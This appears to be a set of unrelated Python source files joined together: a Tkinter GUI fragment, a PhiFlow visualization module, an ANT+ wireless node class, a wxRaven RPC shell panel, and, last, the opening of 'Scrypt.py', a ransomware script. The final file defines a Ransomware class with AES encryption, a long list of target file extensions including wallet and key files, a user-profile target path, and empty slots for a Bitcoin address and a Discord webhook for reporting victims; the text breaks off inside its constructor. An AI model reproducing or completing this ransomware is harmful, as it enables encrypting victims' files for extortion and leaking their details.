calculator_button = Button(top_status,text="Calculator",command=calculator,width=b_wd)
calculator_button.grid(row=0,column=7)
calculator_button.config(bg=button_bg,fg=button_fg,font=font)
#fullscreen = Button(top_status,bg=button_bg,fg=button_fg,font=font,text="FULL SCREEN",width=b_wd,command=fullscreen)
#fullscreen.grid(row=0,column=4,pady=10)
#theme_button = Button(window,bg=fg,fg=bg,text="Theme",font=font)
#theme_button.grid(row=1,column=6,sticky=W+E,pady=10)
upload_button = Button(top_status,bg=button_bg,fg=button_fg,width=b_wd,font=font,text="Upload",command=upload_to_cloud)
upload_button.grid(row=0,column=3)
help_button = Button(top_status,bg=button_bg,width=b_wd,fg=button_fg,font=font,text="HELP",command=help_open)
help_button.grid(row=0,column=8)
full_database = Button(top_status,width=b_wd,text="View",bg=button_bg,fg=button_fg,font=font,command=view)
full_database.grid(row=0,column=0)
quit_button = Button(top_status,width=b_wd,text="Exit",bg=button_bg,fg=button_fg,font=font,command=quit)
quit_button.grid(row=0,column=10)
graph_button = Button(top_status,width=b_wd,text="GRAPH",command=lambda: graph_canvas(window=window_,window1=put_the_elements,window2=window))
graph_button.grid(row=0,column=4,pady=10)
graph_button.config(bg=button_bg,fg=button_fg,font=font)
def adv_dat():
window.destroy()
advanced_data(window=window_,window1=put_the_elements)
advanced_data_button = Button(top_status,width=10,text="Other Data",command=adv_dat)
advanced_data_button.grid(row=0,column=6,pady=10)
advanced_data_button.config(bg=button_bg,fg=button_fg,font=font)
settings_ = Button(top_status,width=10,text="Settings",bg=button_bg,fg=button_fg,font=font,command=setting)
settings_.grid(row=0,column=9,pady=10)
delete()
search_function()
global end
end = time.time()
print(colored("Audit future rendering completed","green"))
print("["+colored("login","green")+"]","user has been logged in")
time__ = str(datetime.datetime.now())
print("["+colored("logged in at","green")+"]",colored(time__,"yellow"))
print("["+colored("user name","green")+"]",d["name"])
print(colored("first time user:","yellow"),colored(d["first_time"],"green"))
print("["+colored("user theme","green")+"]",d["theme"])
window.mainloop()
put_the_elements()
window_start()
print(colored("App status of last boot:","green"))
print("Time taken to start: "+colored(str(end-start),"yellow")+" Seconds")
|
_vis.py
|
import inspect
import os
from threading import Thread
from ._user_namespace import get_user_namespace, UserNamespace, DictNamespace
from ._viewer import create_viewer, Viewer
from ._vis_base import get_gui, default_gui, Control, display_name, value_range, Action, VisModel, Gui
from ..field import SampledField, Scene
from ..field._scene import _slugify_filename
def show(model: VisModel or None = None, play=True, gui: Gui or str = None, keep_alive=True, **config):
"""
Launch the registered user interface (web interface by default).
This method may block until the GUI is closed.
This method prepares the vis before showing it. No more fields should be added to the vis after this method is invoked.
Also see the user interface documentation at https://tum-pbs.github.io/PhiFlow/Visualization.html
Args:
model: (Optional) `VisModel`, the application to display. If unspecified, searches the calling script for a subclass of App and instantiates it.
play: If true, invokes `App.play()`. The default value is False unless "autorun" is passed as a command line argument.
gui: (optional) class of GUI to use
keep_alive: Whether the GUI keeps the vis alive. If `False`, the program will exit when the main script is finished.
**config: additional GUI configuration parameters.
For a full list of parameters, see the respective GUI documentation at https://tum-pbs.github.io/PhiFlow/Visualization.html
"""
if model is None:
import pylab
pylab.show()
return
assert isinstance(model, VisModel), f"show() first argument must be an App instance but got {model}"
model.prepare()
# --- Setup Gui ---
gui = default_gui() if gui is None else get_gui(gui)
gui.configure(config)
gui.setup(model)
if play: # this needs to be done even if model cannot progress right now
gui.auto_play()
if gui.asynchronous:
display_thread = Thread(target=lambda: gui.show(True), name="AsyncGui", daemon=not keep_alive)
display_thread.start()
else:
gui.show(True) # may be blocking call
RECORDINGS = {}
def record(*fields: str or SampledField) -> Viewer:
user_namespace = get_user_namespace(1)
variables = _default_field_variables(user_namespace, fields)
viewer = create_viewer(user_namespace, variables, "record", "", scene=None, asynchronous=False, controls=(), actions={}, log_performance=False)
viewer.post_step.append(lambda viewer: print(viewer.steps, end=" "))
viewer.progress_unavailable.append(lambda viewer: print())
return viewer
def view(*fields: str or SampledField,
play: bool = True,
gui=None,
name: str = None,
description: str = None,
scene: bool or Scene = False,
keep_alive=True,
select: str or tuple or list = '',
framerate=None,
namespace=None,
**config) -> Viewer:
"""
Show `fields` in a graphical user interface.
`fields` may contain instances of `Field` or variable names of top-level variables (main module or Jupyter notebook).
During loops, e.g. `view().range()`, the variable status is tracked and the GUI is updated.
When called from a Python script, name and description may be specified in the module docstring (string before imports).
The first line is interpreted as the name, the rest as the subtitle.
If not specified, a generic name and description is chosen.
Args:
*fields: (Optional) Contents to be displayed. Either variable names or values.
For field instances, all variables referencing the value will be shown.
If not provided, the user namespace is searched for Field variables.
play: Whether to immediately start executing loops.
gui: (Optional) Name of GUI as `str` or GUI class.
Built-in GUIs can be selected via `'dash'`, `'console'` and `'widgets'`.
See https://tum-pbs.github.io/PhiFlow/Visualization.html
name: (Optional) Name to display in GUI and use for the output directory if `scene=True`.
Will be generated from the top-level script if not provided.
description: (Optional) Description to be displayed in the GUI.
Will be generated from the top-level script if not provided.
scene: Existing `Scene` to write into or `bool`. If `True`, creates a new Scene in `~/phi/<name>`
keep_alive: Whether the GUI should keep running even after the main thread finishes.
framerate: Target frame rate in Hz. Play will not step faster than the framerate. `None` for unlimited frame rate.
select: Dimension names along which one item to show is selected.
Dimensions may be passed as `tuple` of `str` or as comma-separated names in a single `str`.
For each `select` dimension, an associated selection slider will be created.
**config: Additional GUI configuration arguments.
Returns:
`Viewer`
"""
default_namespace = get_user_namespace(1)
user_namespace = default_namespace if namespace is None else DictNamespace(namespace, title=default_namespace.get_title(), description=default_namespace.get_description(), reference=default_namespace.get_reference())
variables = _default_field_variables(user_namespace, fields)
actions = dict(ACTIONS)
ACTIONS.clear()
if scene is False:
scene = None
elif scene is True:
scene = Scene.create(os.path.join("~", "phi", _slugify_filename(name or user_namespace.get_reference())))
print(f"Created scene at {scene}")
else:
assert isinstance(scene, Scene)
name = name or user_namespace.get_title()
description = description or user_namespace.get_description()
gui = default_gui() if gui is None else get_gui(gui)
controls = tuple(c for c in sorted(CONTROL_VARS.values(), key=lambda c: c.name) if user_namespace.get_variable(c.name) is not None)
CONTROL_VARS.clear()
viewer = create_viewer(user_namespace, variables, name, description, scene, asynchronous=gui.asynchronous, controls=controls, actions=actions, log_performance=True)
show(viewer, play=play, gui=gui, keep_alive=keep_alive, framerate=framerate, select=select, **config)
return viewer
def _default_field_variables(user_namespace: UserNamespace, fields: tuple):
names = []
values = []
if len(fields) == 0: # view all Fields
user_variables = user_namespace.list_variables(only_public=True, only_current_scope=True)
for name, val in user_variables.items():
if isinstance(val, SampledField):
names.append(name)
values.append(val)
else: # find variable names
user_variables = user_namespace.list_variables()
for field in fields:
if isinstance(field, str):
split = [n.strip() for n in field.split(',')]
names.extend(split)
values.extend([user_namespace.get_variable(n, default=None) for n in split])
else:
for name, val in user_variables.items():
if val is field:
names.append(name)
values.append(field)
return {n: v for n, v in zip(names, values)}
def control(value, range: tuple = None, description="", **kwargs):
"""
Mark a variable as controllable by any GUI created via `view()`.
Example:
```python
dt = control(1.0, (0.1, 10), name="Time increment")
```
The value o
Args:
value: Initial value. Must be either `int`, `float´, `bool` or `str`.
range: (Optional) Specify range of possible values as `(min, max)`. Only for `int` and `float` values.
description: Description of what the control does.
**kwargs: Additional arguments to determine the appearance of the GUI component,
e.g. `rows` for text fields or `log=False` for float sliders.
Returns:
`value`
"""
assert type(value) in (int, float, bool, str), f"Value must be one of (int, float, bool, str) but {type(value)}"
calling_code = inspect.stack()[1].code_context[0]
assert 'control' in calling_code and '=' in calling_code, f"control() must be used in a variable assignment statement but context is: {calling_code}"
calling_code = calling_code[:calling_code.index('control')]
var_names = [var.strip() for var in calling_code.split('=')[:-1]]
var_names = [n for n in var_names if n]
for var_name in var_names:
ctrl = Control(var_name, type(value), value, range, description, kwargs)
value_range(ctrl) # checks if valid
CONTROL_VARS[var_name] = ctrl
return value
CONTROL_VARS = {}
def action(fun):
doc = inspect.getdoc(fun)
ACTIONS[Action(fun.__name__, doc)] = fun
ACTIONS = {}
|
node.py
|
# Ant
#
# Copyright (c) 2012, Gustav Tiger <gustav@tiger.name>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import collections
import threading
import logging
try:
# Python 3
import queue
except ImportError:
# Python 2
import Queue as queue
from ant.base.ant import Ant
from ant.base.message import Message
from ant.easy.channel import Channel
from ant.easy.filter import wait_for_event, wait_for_response, wait_for_special
_logger = logging.getLogger("ant.easy.node")
class Node:
def __init__(self):
self._responses_cond = threading.Condition()
self._responses = collections.deque()
self._event_cond = threading.Condition()
self._events = collections.deque()
self._datas = queue.Queue()
self.channels = {}
self.ant = Ant()
self._running = True
self._worker_thread = threading.Thread(target=self._worker, name="ant.easy")
self._worker_thread.start()
def new_channel(self, ctype, network_number=0x00, ext_assign=None):
size = len(self.channels)
channel = Channel(size, self, self.ant)
self.channels[size] = channel
channel._assign(ctype, network_number, ext_assign)
return channel
def request_message(self, messageId):
_logger.debug("requesting message %#02x", messageId)
self.ant.request_message(0, messageId)
_logger.debug("done requesting message %#02x", messageId)
return self.wait_for_special(messageId)
def set_network_key(self, network, key):
self.ant.set_network_key(network, key)
return self.wait_for_response(Message.ID.SET_NETWORK_KEY)
def wait_for_event(self, ok_codes):
return wait_for_event(ok_codes, self._events, self._event_cond)
def wait_for_response(self, event_id):
return wait_for_response(event_id, self._responses, self._responses_cond)
def wait_for_special(self, event_id):
return wait_for_special(event_id, self._responses, self._responses_cond)
def _worker_response(self, channel, event, data):
self._responses_cond.acquire()
self._responses.append((channel, event, data))
self._responses_cond.notify()
self._responses_cond.release()
def _worker_event(self, channel, event, data):
if event == Message.Code.EVENT_RX_BURST_PACKET:
self._datas.put(("burst", channel, data))
elif event == Message.Code.EVENT_RX_BROADCAST:
self._datas.put(("broadcast", channel, data))
elif event == Message.Code.EVENT_TX:
self._datas.put(("broadcast_tx", channel, data))
elif event == Message.Code.EVENT_RX_ACKNOWLEDGED:
self._datas.put(("acknowledge", channel, data))
else:
self._event_cond.acquire()
self._events.append((channel, event, data))
self._event_cond.notify()
self._event_cond.release()
def _worker(self):
self.ant.response_function = self._worker_response
self.ant.channel_event_function = self._worker_event
# TODO: check capabilities
self.ant.start()
def _main(self):
while self._running:
try:
(data_type, channel, data) = self._datas.get(True, 1.0)
self._datas.task_done()
if data_type == "broadcast":
self.channels[channel].on_broadcast_data(data)
elif data_type == "burst":
self.channels[channel].on_burst_data(data)
elif data_type == "broadcast_tx":
self.channels[channel].on_broadcast_tx_data(data)
elif data_type == "acknowledge":
self.channels[channel].on_acknowledge_data(data)
else:
_logger.warning("Unknown data type '%s': %r", data_type, data)
except queue.Empty as e:
pass
def start(self):
self._main()
def stop(self):
if self._running:
_logger.debug("Stoping ant.easy")
self._running = False
self.ant.stop()
self._worker_thread.join()
|
wxRavenShellLogic.py
|
'''
Created on 13 déc. 2021
@author: slinux
'''
import wx.aui
#from wxRavenGUI.view import wxRavenDesign
from .wxRavenShellDesign import *
import wx.py as py
import threading
import time
from wxRavenGUI.application.wxcustom import *
import os
wildcard = "Python source (*.py)|*.py|" \
"Compiled Python (*.pyc)|*.pyc|" \
"All files (*.*)|*.*"
class shellMainPanel(wxRavenShellPanel):
'''
classdocs
'''
view_base_name = "RavenRPC Shell"
view_name = "RavenRPC Shell"
parent_frame = None
default_position = "toolbox1"
icon = 'shell' #wx.Bitmap( u"res/default_style/normal/shell.png", wx.BITMAP_TYPE_ANY )
def __init__(self, parentFrame, position = "toolbox1", viewName= "Shell"):
'''
Constructor
'''
super().__init__(parent=parentFrame)
#parentFrame.m_mgr.AddPane( self, wx.aui.AuiPaneInfo() .Left() .Caption( u"wxRavenFrame" ).MaximizeButton( True ).MinimizeButton( True ).PinButton( True ).Dock().Resizable().FloatingSize( wx.DefaultSize ) )
"""
parentFrame.m_mgr.AddPane( self, wx.aui.AuiPaneInfo() .Bottom() .Caption( u"> Shell" ).MaximizeButton( True ).MinimizeButton( True ).PinButton( True ).Dock().Resizable().FloatingSize( wx.DefaultSize ) )
parentFrame.m_mgr.Update()
parentFrame.Centre( wx.BOTH )
"""
self.view_base_name = "Shell"
self.view_name = viewName
self.parent_frame = parentFrame
self.default_position = position
self.simpleShell()
#parentFrame.RessourcesProvider.ApplyThemeOnPanel(self)
parentFrame.Add(self, self.view_name ,position, parentFrame.RessourcesProvider.GetImage(self.icon))
#parentFrame.AddInMainFrame(self, "Shell" )
#parentFrame.AddInNotebook(self, "Shell",parentFrame.wxRavenMainBook )
#parentFrame.AddInNotebook(self, "Shell",parentFrame.wxRavenToolBook1 , self.icon)
#parentFrame.AddInNotebook(self, "Shell",parentFrame.wxRavenToolBook2 )
#self.refreshMenuItemList()
#self.Bind(wx.EVT_MENU, self.wxRavenShellPanelOnContextMenu, self.rpcConnexions_dropdown_button)
def UpdateView(self):
pass
def OnRunScriptClicked(self, evt):
#_chddir = wx.FD_CHANGE_DIR
dlg = wx.FileDialog(
self, message="Choose a file",
defaultDir=os.getcwd(),
defaultFile="",
wildcard=wildcard,
style=wx.FD_OPEN |
wx.FD_FILE_MUST_EXIST |
wx.FD_PREVIEW
)
if dlg.ShowModal() == wx.ID_OK:
pathname = dlg.GetPath()
dlg.Destroy()
#if UserQuestion(self, "Run from file path itself ?"):
# os.chdir(os.path.dirname(pathname))
self.RunScript(pathname)
def RunScript(self, filescript):
print(f'Running Script : {filescript}')
self.wxRavenShell.write(f'Running Script : {filescript}')
self.wxRavenShell.execStartupScript(filescript)
def simpleShell(self):
bSizer1 = wx.BoxSizer( wx.VERTICAL )
_locals = {"dev": "this is a test"}
_networkName = self.parent_frame.ConnexionManager.getCurrent()
#_icon = self.parent_frame.GetPluginData("RavenRPC", "_icon")
startupText = """PyRPC Basic Shell for wxRaven - Active Network : %NETWORKNAME%
- network.<command>() execute RPC Raw Commands
- ravencoin.<command>() execute Ravencoin API Commands
- rpc([OptionalName]).<command>() RPC Raw Commands
- api([OptionalName]).<command>() Ravencoin API Commands
"""
startupText = startupText.replace("%NETWORKNAME%", _networkName)
_locals['rpc'] = self.parent_frame.getNetwork
_locals['api'] = self.parent_frame.getRvnRPC
_locals['network'] = self.parent_frame.getNetwork(_networkName)
_locals['ravencoin'] = self.parent_frame.getRvnRPC(_networkName)
_locals['wxRaven'] = self.parent_frame
try:
_addinLocals = self.parent_frame.GetPlugin("RavenRPC").getAddinsLocals()
startupText = startupText + "- All additionals : ["
for _loc in _addinLocals:
_locals[_loc] = _addinLocals[_loc]
startupText = startupText+ " "+ _loc + ", "
startupText = startupText + "]\n"
except Exception as e:
print(str(e))
pass
#advShell = py.crust.Crust(self , intro=startupText , locals = _locals)
self.wxRavenShell = py.shell.Shell(self.m_shellPanel ,-1, introText=startupText, locals = _locals)
bSizer1.Add( self.wxRavenShell, 1, wx.ALL|wx.EXPAND, 5 )
self.Bind(wx.EVT_TOOL, self.OnRunScriptClicked, id= self.m_runPython.GetId())
#self.parent_frame.parentFrame.RessourcesProvider.ApplyThemeOnPanel(self.wxRavenShell)
self.m_shellPanel.SetSizer( bSizer1 )
self.Layout()
class shellAdvancedPanel(wxRavenAdvancedShellPanel):
'''
classdocs
'''
view_base_name = "RavenRPC Advanced Shell"
view_name = "RavenRPC Advanced Shell"
default_position = "toolbox1"
icon = 'shell_adv' # wx.Bitmap( u"res/default_style/normal/shell.png", wx.BITMAP_TYPE_ANY )
_autowsitchNetwork = True
def __init__(self, parentFrame, position = "toolbox1", viewName= "Shell"):
'''
Constructor
'''
super().__init__(parent=parentFrame)
#parentFrame.m_mgr.AddPane( self, wx.aui.AuiPaneInfo() .Left() .Caption( u"wxRavenFrame" ).MaximizeButton( True ).MinimizeButton( True ).PinButton( True ).Dock().Resizable().FloatingSize( wx.DefaultSize ) )
"""
parentFrame.m_mgr.AddPane( self, wx.aui.AuiPaneInfo() .Bottom() .Caption( u"> Shell" ).MaximizeButton( True ).MinimizeButton( True ).PinButton( True ).Dock().Resizable().FloatingSize( wx.DefaultSize ) )
parentFrame.m_mgr.Update()
parentFrame.Centre( wx.BOTH )
"""
self.view_base_name = "Shell"
self.view_name = viewName
self.parent_frame = parentFrame
self.default_position = position
self._autowsitchNetwork=True
self.m_auiToolBar1.ToggleTool(self.rpcConnexions_autoswitch.GetId(),self._autowsitchNetwork)
self._currentLocalNetworkName= self.parent_frame.ConnexionManager.getCurrent()
self._currentLocalNetworkIcon= self.parent_frame.ConnexionManager.getIcon()
self.helpCommandPannel = None
parentFrame.Add(self, self.view_name ,position, parentFrame.RessourcesProvider.GetImage(self.icon))
#self.defaultShell()
self.waitApplicationReady()
#Replaced by the main plugin data management
#self.parent_frame.ConnexionManager.RegisterOnConnexionChanged(self.setStatusBarActiveNetwork)
def waitApplicationReady(self):
t=threading.Thread(target=self.__waitLoop_T__, args=(self.defaultShell,))
t.start()
def __waitLoop_T__(self,callback):
while not self.parent_frame._isReady:
time.sleep(2)
wx.CallAfter(callback, ())
def defaultShell(self, evt=None):
_locals = {"dev": "this is a test"}
_icon = self.icon
_networkName = ""
if self.getAutoSwitchStateIsChecked() :
_networkName = self.parent_frame.GetPluginData("RavenRPC", "current_connexion")
_icon = self.parent_frame.GetPluginData("RavenRPC", "_icon")
#_locals['network'] = self.parent_frame.getNetwork(_networkName)
else:
_networkName = self._currentLocalNetworkName
_icon = self._currentLocalNetworkIcon
if _networkName == None:
return
startupText = """PyRPC Advanced Shell for wxRaven - Active Network : %NETWORKNAME%
- network.<command>() execute RPC Raw Commands
- ravencoin.<command>() execute Ravencoin API Commands
- rpc([OptionalName]).<command>() RPC Raw Commands
- api([OptionalName]).<command>() Ravencoin API Commands
"""
startupText = startupText.replace("%NETWORKNAME%", _networkName)
_locals['network'] = self.parent_frame.getNetwork(_networkName)
_locals['ravencoin'] = self.parent_frame.getRvnRPC(_networkName)
_locals['rpc'] = self.parent_frame.getNetwork
_locals['api'] = self.parent_frame.getRvnRPC
_locals['wxRaven'] = self.parent_frame
try:
_addinLocals = self.parent_frame.GetPlugin("RavenRPC").getAddinsLocals()
startupText = startupText + "- All additionals from plugins : ["
for _loc in _addinLocals:
_locals[_loc] = _addinLocals[_loc]
startupText = startupText+ " "+ _loc + ", "
startupText = startupText + "]\n"
except Exception as e:
print(str(e))
advShell = py.crust.Crust(self , intro=startupText , locals = _locals)
#advShell = py.crust.CrustFrame(self , locals = _locals)
#advShell.ToggleTools()
_titlePage = "PyRPC Shell (" + _networkName + ")"
#self.wxRavenShell = py.shell.Shell(self ,-1, introText=startupText)
self.wxRavenAdvancedShellPanelNotebook.AddPage(advShell, _titlePage, bitmap = _icon)
def OnContextMenu_ShowNetworkList(self, evt):
self.refreshNetworkMenuItemList()
self.showNetworkListMenu()
def showNetworkListMenu(self):
mposx, mposy = wx.GetMousePosition()
cposx, cposy = self.parent_frame.ScreenToClient((mposx, mposy))
self.parent_frame.PopupMenu( self.rpcConnexions_dropdown_menu, self.parent_frame.ScreenToClient((mposx, mposy)) )
def cleanNetworkList(self):
for i in self.rpcConnexions_dropdown_menu.GetMenuItems():
self.rpcConnexions_dropdown_menu.Delete(i)
def refreshNetworkMenuItemList(self):
if self.rpcConnexions_dropdown_menu.GetMenuItemCount() > 0:
self.cleanNetworkList()
try:
for text in self.parent_frame.GetPluginData("RavenRPC","all_connexion") :
item = self.rpcConnexions_dropdown_menu.AppendRadioItem(-1, text)
if self.getAutoSwitchStateIsChecked() :
if text == self.parent_frame.GetPluginData("RavenRPC","current_connexion"):
item.Check(True)
else:
if text == self._currentLocalNetworkName:
item.Check(True)
self.parent_frame.Bind(wx.EVT_MENU, self.OnPopupNetworkItemSelected, item)
except Exception as e:
self.parent_frame.Log("Unable to load the network list" , type="warning")
#print("refreshNetworkMenuItemList() " + str(e))
pass
#if self.getAutoSwitchStateIsChecked() :
#else:
def OnPopupNetworkItemSelected(self, event):
item = self.rpcConnexions_dropdown_menu.FindItemById(event.GetId())
text = item.GetItemLabelText()
#print(self.rpcConnexions_autoswitch.GetState())
if self.getAutoSwitchStateIsChecked() :
self.parent_frame.ConnexionManager.setCurrentConnexion(text)
else:
self._currentLocalNetworkName = text
self._currentLocalNetworkIcon= self.parent_frame.ConnexionManager.getIcon(self._currentLocalNetworkName)
self.setStatusBarActiveNetwork()
#Todo = change local icon !
def UpdateView(self):
self.setStatusBarActiveNetwork("")
self.refreshNetworkMenuItemList()
def setStatusBarActiveNetwork(self, networkName=''):
#if autottogle we read plugin data, else local panel
if self.getAutoSwitchStateIsChecked() :
#networkName= self.parent_frame.ConnexionManager.getCurrent()
networkName = self.parent_frame.GetPluginData("RavenRPC", "current_connexion")
#icon = self.parent_frame.ConnexionManager.getIcon(networkName)
icon = self.parent_frame.GetPluginData("RavenRPC", "_icon")
self.rpcConnexions_dropdown_button.SetBitmap(icon)
else:
#networkName = self._currentLocalNetworkName
#icon = self.ConnexionManager.getIcon(networkName)
self.rpcConnexions_dropdown_button.SetBitmap(self._currentLocalNetworkIcon)
self.Layout()
def OnAutoswitchChanged(self, event):
#print("swtichedauto " + str(self.getAutoSwitchStateIsChecked()))
self.setStatusBarActiveNetwork("")
self._autowsitchNetwork = self.getAutoSwitchStateIsChecked()
def getAutoSwitchStateIsChecked(self):
res=False
if self.m_auiToolBar1.GetToolToggled(self.rpcConnexions_autoswitch.GetId()):
#if self.rpcConnexions_autoswitch.GetState() in [32 ,34 ] :
res=True
return res
def OnNewTerminal(self, event):
self.defaultShell()
def OnCloseTerminal(self, event):
cp = self.wxRavenAdvancedShellPanelNotebook.GetCurrentPage()
cpi = self.wxRavenAdvancedShellPanelNotebook.GetPageIndex(cp)
self.wxRavenAdvancedShellPanelNotebook.DeletePage(cpi)
def OnRPCHelp(self, event):
if self.helpCommandPannel == None:
#print("None")
newHelpPanel = ShellDocumentationHelper(self.parent_frame, position="wxRavenAdvancedShellPanelNotebook")
#self.wxRavenAdvancedShellPanelNotebook.AddPage(newHelpPanel, "RPC Command List", bitmap = newHelpPanel.icon)
_panIcon = self.parent_frame.RessourcesProvider.GetImage(newHelpPanel.icon)
self.wxRavenAdvancedShellPanelNotebook.AddPage(newHelpPanel, "RPC Command List", bitmap = _panIcon)
self.helpCommandPannel = newHelpPanel
#self.helpCommandPannel.FillHelpDocumentationTreebook()
else:
#self.helpCommandPannel.FillHelpDocumentationTreebook()
print("already")
pass
class ShellDocumentationHelper(wxRavenShellDocumentation):
'''
classdocs
'''
view_base_name = "RPC Documentation Helper"
view_name = "RPC Documentation Helper"
default_position = "main"
icon = 'bookmarks_view' #wx.Bitmap( u"res/default_style/normal/bookmarks_view.png", wx.BITMAP_TYPE_ANY )
def __init__(self, parentFrame, position = "main", viewName= "RPC Documentation Helper"):
'''
Constructor
'''
super().__init__(parent=parentFrame)
#parentFrame.m_mgr.AddPane( self, wx.aui.AuiPaneInfo() .Left() .Caption( u"wxRavenFrame" ).MaximizeButton( True ).MinimizeButton( True ).PinButton( True ).Dock().Resizable().FloatingSize( wx.DefaultSize ) )
"""
parentFrame.m_mgr.AddPane( self, wx.aui.AuiPaneInfo() .Bottom() .Caption( u"> Shell" ).MaximizeButton( True ).MinimizeButton( True ).PinButton( True ).Dock().Resizable().FloatingSize( wx.DefaultSize ) )
parentFrame.m_mgr.Update()
parentFrame.Centre( wx.BOTH )
"""
self.view_base_name = "RPC Documentation Helper"
self.view_name = viewName
self.parent_frame = parentFrame
self.default_position = position
self._cursor = 0
#self.helpCommandPannel.FillHelpDocumentationTreebook()
#parentFrame.Add(self, self.view_name ,position, self.icon)
if position != "wxRavenAdvancedShellPanelNotebook":
parentFrame.Add(self, self.view_name ,position, self.parent_frame.RessourcesProvider.GetImage(self.icon))
self.SetupTreebook()
self.FillHelpDocumentationTreebook()
self.Show()
"""
def LoadHelpDocumentation_T(self, networkName=""):
t=threading.Thread(target=self.LoadHelpDocumentation)
t.start()
def LoadHelpDocumentation(self):
pass
"""
def OnSearch(self, evt):
self.FillHelpDocumentationTreebook()
#self.search.GetValue()
def SetupTreebook(self):
self.il = wx.ImageList(16, 16)
self.defaultIcon = self.il.Add(self.parent_frame.RessourcesProvider.GetImage(self.icon))
self.m_customControl2.AssignImageList(self.il)
def UpdateView(self):
pass
def CleanTree(self):
while self._cursor>0:
#print(self._cursor)
self.m_customControl2.DeletePage(self._cursor-1)
self._cursor = self._cursor-1
def FillHelpDocumentationTreebook(self):
#
# To put a trry and retry
#
self.m_customControl2.Freeze()
#self.m_customControl2.Thaw()
self.CleanTree()
self._cursor = 0
filterSearch = self.m_searchCtrl1.GetValue()
if len(filterSearch) < 2 :
filterSearch=""
#print(filterSearch)
try:
#self.GetPlugin("General").Log(message , source, timestamp, type)
_CmdList= self.parent_frame.GetPluginData("RavenRPC","_CmdList")
#print("Fill")
for _cmd in _CmdList:
#print(_cmd)
if filterSearch != "" :
if not filterSearch.__contains__('*') and (not _cmd.__contains__(filterSearch) ) :
continue
elif filterSearch.__contains__('*') :
_replaceStr = filterSearch.replace('*', '')
if (not _cmd.__contains__(_replaceStr) and not _CmdList[_cmd].__contains__(_replaceStr) ) :
continue
_commandeHelperPanel = ShellCommandDescriberPanel(self.m_customControl2, _CmdList[_cmd])
self.m_customControl2.AddPage(_commandeHelperPanel, _cmd, imageId=self.defaultIcon)
self._cursor = self._cursor +1
except Exception as e:
#print("FillHelpDocumentationTreebook :" + str(e))
self.parent_frame.Log("Unable to load the commands list" , type="warning")
self.m_customControl2.Thaw()
self.Layout()
class ShellCommandDescriberPanel(wxRavenShellCommandDescriber):
def __init__(self, parent, desc):
wxRavenShellCommandDescriber.__init__(self, parent)
self.cmdHelper.SetValue(desc)
|
Scrypt.py
|
import PyQt5
import PyQt5.QtWidgets
import PyQt5.QtCore
import sys
import requests
import random
import string
import threading
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import os
import shutil
btcAdd = ""
email = ""
discordWebhook = ""
fileTypes = ['.txt','.exe','.php','.pl','.7z','.rar','.m4a','.wma','.avi','.wmv','.csv','.d3dbsp','.sc2save','.sie','.sum','.ibank','.t13','.t12','.qdf','.gdb','.tax','.pkpass','.bc6','.bc7','.bkp','.qic','.bkf','.sidn','.sidd','.mddata','.itl','.itdb','.icxs','.hvpl','.hplg','.hkdb','.mdbackup','.syncdb','.gho','.cas','.svg','.map','.wmo','.itm','.sb','.fos','.mcgame','.vdf','.ztmp','.sis','.sid','.ncf','.menu','.layout','.dmp','.blob','.esm','.001','.vtf','.dazip','.fpk','.mlx','.kf','.iwd','.vpk','.tor','.psk','.rim','.w3x','.fsh','.ntl','.arch00','.lvl','.snx','.cfr','.ff','.vpp_pc','.lrf','.m2','.mcmeta','.vfs0','.mpqge','.kdb','.db0','.mp3','.upx','.rofl','.hkx','.bar','.upk','.das','.iwi','.litemod','.asset','.forge','.ltx','.bsa','.apk','.re4','.sav','.lbf','.slm','.bik','.epk','.rgss3a','.pak','.big','.unity3d','.wotreplay','.xxx','.desc','.py','.m3u','.flv','.js','.css','.rb','.png','.jpeg','.p7c','.p7b','.p12','.pfx','.pem','.crt','.cer','.der','.x3f','.srw','.pef','.ptx','.r3d','.rw2','.rwl','.raw','.raf','.orf','.nrw','.mrwref','.mef','.erf','.kdc','.dcr','.cr2','.crw','.bay','.sr2','.srf','.arw','.3fr','.dng','.jpeg','.jpg','.cdr','.indd','.ai','.eps','.pdf','.pdd','.psd','.dbfv','.mdf','.wb2','.rtf','.wpd','.dxg','.xf','.dwg','.pst','.accdb','.mdb','.pptm','.pptx','.ppt','.xlk','.xlsb','.xlsm','.xlsx','.xls','.wps','.docm','.docx','.doc','.odb','.odc','.odm','.odp','.ods','.odt','.sql','.zip','.tar','.tar.gz','.tgz','.biz','.ocx','.html','.htm','.3gp','.srt','.cpp','.mid','.mkv','.mov','.asf','.mpeg','.vob','.mpg','.fla','.swf','.wav','.qcow2','.vdi','.vmdk','.vmx','.gpg','.aes','.ARC','.PAQ','.tar.bz2','.tbk','.bak','.djv','.djvu','.bmp','.cgm','.tif','.tiff','.NEF','.cmd','.class','.jar','.java','.asp','.brd','.sch','.dch','.dip','.vbs','.asm','.pas','.ldf','.ibd','.MYI','.MYD','.frm','.dbf','.SQLITEDB','.SQLITE3','.asc','.lay6','.lay','.ms11(Securitycopy)','.sldm','.sldx','.ppsm','.ppsx','.ppam','.docb','.mml','.sxm','.otg','.slk','.xlw','.xlt','.xlm','.xlc','.dif','.stc','.sxc','.ots','.ods','.hwp','.dotm','.dotx','.docm','.DOT','.max','.xml','.uot','.stw','.sxw','.ott','.csr','.key','wallet.dat']
class Ransomware(PyQt5.QtCore.QRunnable):
def __init__(self):
super(Ransomware, self).__init__()
self.threadpool = PyQt5.QtCore.QThreadPool()
self.randomId = self.rID(12)
self.encryptionPass = self.rSeed(32)
self.filePath = "C:\\Users\\"
self.ip = ""
self.userName = ""
